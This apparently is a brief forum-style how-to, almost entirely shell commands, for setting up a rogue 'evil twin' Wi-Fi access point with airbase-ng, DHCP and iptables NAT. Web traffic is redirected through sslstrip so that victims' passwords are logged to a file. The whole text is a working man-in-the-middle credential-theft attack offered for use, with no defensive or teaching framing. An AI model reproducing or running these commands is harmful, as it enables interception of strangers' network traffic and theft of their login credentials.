this work with me try it

#Open Term1
airmon-ng start wlan1
airbase-ng -e "DumDum" -c 11 -v mon0

#Open Term2
#Install a DHCP for your access point
nano /etc/dhcp3/dhcpd.conf

default-lease-time 700;
max-lease-time 8000;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}


#start your new WifiRouter.
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

#Start your WifiRouters DHCP
echo > '/var/lib/dhcp/dhcpd.leases'
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0

#open Term3
#clear any old iptables and nats you might have

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#change directory in to ssl stripper to make life easyer
cd /usr/share/sslstrip/
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 4444
echo "1" > /proc/sys/net/ipv4/ip_forward

#Start SSL Stripper
./sslstrip.py -l 4444 -w password.txt